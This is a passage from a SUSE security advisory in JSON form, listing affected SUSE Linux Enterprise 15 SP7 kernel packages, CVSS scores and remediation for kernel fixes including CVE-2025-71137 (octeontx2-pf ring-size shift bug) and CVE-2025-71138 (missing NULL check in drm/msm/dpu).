"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71136"
},
{
"cve": "CVE-2025-71137",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71137"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nocteontx2-pf: fix \"UBSAN: shift-out-of-bounds error\"\n\nThis patch ensures that the RX ring size (rx_pending) is not\nset below the permitted length. This avoids UBSAN\nshift-out-of-bounds errors when users passes small or zero\nring sizes via ethtool -G.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71137",
"url": "https://www.suse.com/security/cve/CVE-2025-71137"
},
{
"category": "external",
"summary": "SUSE Bug 1256760 for CVE-2025-71137",
"url": "https://bugzilla.suse.com/1256760"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71137"
},
{
"cve": "CVE-2025-71138",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71138"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm/dpu: Add missing NULL pointer check for pingpong interface\n\nIt is checked almost always in dpu_encoder_phys_wb_setup_ctl(), but in a\nsingle place the check is missing.\nAlso use convenient locals instead of phys_enc-\u003e* where available.\n\nPatchwork: https://patchwork.freedesktop.org/patch/693860/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
